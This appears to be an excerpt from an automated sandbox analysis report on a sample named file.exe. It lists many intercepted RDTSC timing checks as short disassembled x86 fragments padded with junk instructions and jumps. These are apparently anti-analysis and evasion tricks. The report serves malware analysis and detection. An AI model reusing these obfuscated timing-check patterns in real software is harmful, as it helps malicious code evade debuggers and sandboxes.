Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78D70 second address: B78DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F08C0CB4528h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 jnp 00007F08C0CB452Ch 0x0000002b ja 00007F08C0CB453Dh 0x00000031 lea eax, dword ptr [ebp+1247767Ah] 0x00000037 mov edx, dword ptr [ebp+122D2F41h] 0x0000003d nop 0x0000003e push eax 0x0000003f push edx 0x00000040 push ecx 0x00000041 jmp 00007F08C0CB4538h 0x00000046 pop ecx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78DFF second address: B78E11 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007F08C0C91964h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78E11 second address: B78E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78E17 second address: B55B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007F08C0C91958h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 jmp 00007F08C0C91962h 0x00000025 call dword ptr [ebp+12443A95h] 0x0000002b pushad 0x0000002c pushad 0x0000002d js 00007F08C0C91956h 0x00000033 push esi 0x00000034 pop esi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B334F7 second address: B334FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA74F6 second address: BA7508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA76A3 second address: BA76A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7AE8 second address: BA7B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F08C0C91962h 0x0000000b jmp 00007F08C0C91962h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7DE7 second address: BA7E04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0CB4538h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F32 second address: BA7F36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F36 second address: BA7F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F08C0CB4528h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F44 second address: BA7F63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Ah 0x00000007 jl 00007F08C0C9195Ch 0x0000000d je 00007F08C0C91956h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F63 second address: BA7F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F69 second address: BA7F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F08C0C91956h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F08C0C91963h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F8A second address: BA7F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7F8F second address: BA7F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F08C0C91956h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC9A2 second address: BAC9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F08C0CB4536h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACB2E second address: BACB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACDB7 second address: BACDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jmp 00007F08C0CB4531h 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F08C0CB452Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BACF36 second address: BACF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ecx 0x00000007 push edx 0x00000008 jng 00007F08C0C91956h 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD0D6 second address: BAD0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F08C0CB4526h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD0E2 second address: BAD0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F08C0C91960h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD0F9 second address: BAD103 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08C0CB4526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD103 second address: BAD11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08C0C9195Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD11B second address: BAD121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD2BE second address: BAD2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F08C0C91956h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD2D4 second address: BAD2D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD2D8 second address: BAD2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08C0C91961h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD2EF second address: BAD2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F08C0CB4526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD2F9 second address: BAD31E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F08C0C91971h 0x0000000e jmp 00007F08C0C91965h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD4A5 second address: BAD4AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD4AF second address: BAD4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD4B3 second address: BAD4BD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD4BD second address: BAD4C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F08C0C91956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD770 second address: BAD774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD774 second address: BAD78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F08C0C91960h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD78D second address: BAD793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD793 second address: BAD7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0C91965h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD913 second address: BAD929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F08C0CB452Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD929 second address: BAD952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F08C0C91969h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jne 00007F08C0C91962h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAD952 second address: BAD958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5FF7 second address: BB600D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F08C0C9195Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB600D second address: BB6013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB6013 second address: BB6025 instructions: 0x00000000 rdtsc 0x00000002 js 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F08C0C9195Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB4E33 second address: BB4E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB4E3B second address: BB4E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB4E40 second address: BB4E59 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 jnp 00007F08C0CB452Ch 0x0000000c jo 00007F08C0CB4526h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB4E59 second address: BB4E6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB537F second address: BB5389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F08C0CB4526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5389 second address: BB538F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB538F second address: BB53CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F08C0CB4539h 0x0000000c jmp 00007F08C0CB4536h 0x00000011 jnl 00007F08C0CB4526h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB53CC second address: BB53F3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F08C0C91972h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB4B38 second address: BB4B42 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F08C0CB4526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5A73 second address: BB5A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5A77 second address: BB5A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB5A7D second address: BB5ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F08C0C91967h 0x0000000c jmp 00007F08C0C91960h 0x00000011 jmp 00007F08C0C91963h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c jne 00007F08C0C91956h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8C3B second address: BB8C6D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jg 00007F08C0CB452Ah 0x00000012 pushad 0x00000013 jp 00007F08C0CB4526h 0x00000019 push edx 0x0000001a pop edx 0x0000001b jc 00007F08C0CB4526h 0x00000021 popad 0x00000022 pushad 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 push edi 0x00000026 pop edi 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBC0DB second address: BBC0DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBC0DF second address: BBC120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4538h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F08C0CB452Eh 0x00000011 jmp 00007F08C0CB452Ch 0x00000016 jns 00007F08C0CB4526h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF15E second address: BBF162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF162 second address: BBF177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F08C0CB4526h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF177 second address: BBF17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBF17B second address: BBF195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08C0CB4534h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEAE4 second address: BBEAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEAE8 second address: BBEAEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEC80 second address: BBEC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE24 second address: BBEE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE2E second address: BBEE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE32 second address: BBEE38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE38 second address: BBEE44 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE44 second address: BBEE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE48 second address: BBEE72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F08C0C91976h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F08C0C91956h 0x00000019 js 00007F08C0C91956h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEE72 second address: BBEE80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F08C0CB452Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3172 second address: BC3176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3176 second address: BC317A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC317A second address: BC3194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F08C0C91956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3620 second address: BC362F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB452Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC362F second address: BC363D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC363D second address: BC3641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3920 second address: BC393C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91964h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC393C second address: BC3940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC3940 second address: BC3944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C606FD second address: 4C6073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop ebx 0x00000006 popad 0x00000007 mov esi, 6101B295h 0x0000000c popad 0x0000000d lea eax, dword ptr [ebp-04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F08C0C9195Dh 0x00000018 pushfd 0x00000019 jmp 00007F08C0C91960h 0x0000001e adc cl, FFFFFF98h 0x00000021 jmp 00007F08C0C9195Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6073E second address: 4C60744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60744 second address: 4C60748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60748 second address: 4C60783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f pushfd 0x00000010 jmp 00007F08C0CB4535h 0x00000015 adc cl, FFFFFFE6h 0x00000018 jmp 00007F08C0CB4531h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60783 second address: 4C607B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F08C0C9195Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 mov si, E2CDh 0x00000019 push eax 0x0000001a push edx 0x0000001b mov ecx, 7D2160EFh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6090F second address: 4C6000D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F08C0CB4532h 0x0000000e popad 0x0000000f retn 0004h 0x00000012 nop 0x00000013 cmp eax, 00000000h 0x00000016 setne al 0x00000019 xor ebx, ebx 0x0000001b test al, 01h 0x0000001d jne 00007F08C0CB4527h 0x0000001f xor eax, eax 0x00000021 sub esp, 08h 0x00000024 mov dword ptr [esp], 00000000h 0x0000002b mov dword ptr [esp+04h], 00000000h 0x00000033 call 00007F08C4F6BDBDh 0x00000038 mov edi, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push edx 0x0000003e pop eax 0x0000003f mov ebx, 13E8690Ch 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6000D second address: 4C6003B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 5437h 0x00000007 mov si, FCD3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F08C0C91966h 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov al, 60h 0x0000001a push edx 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
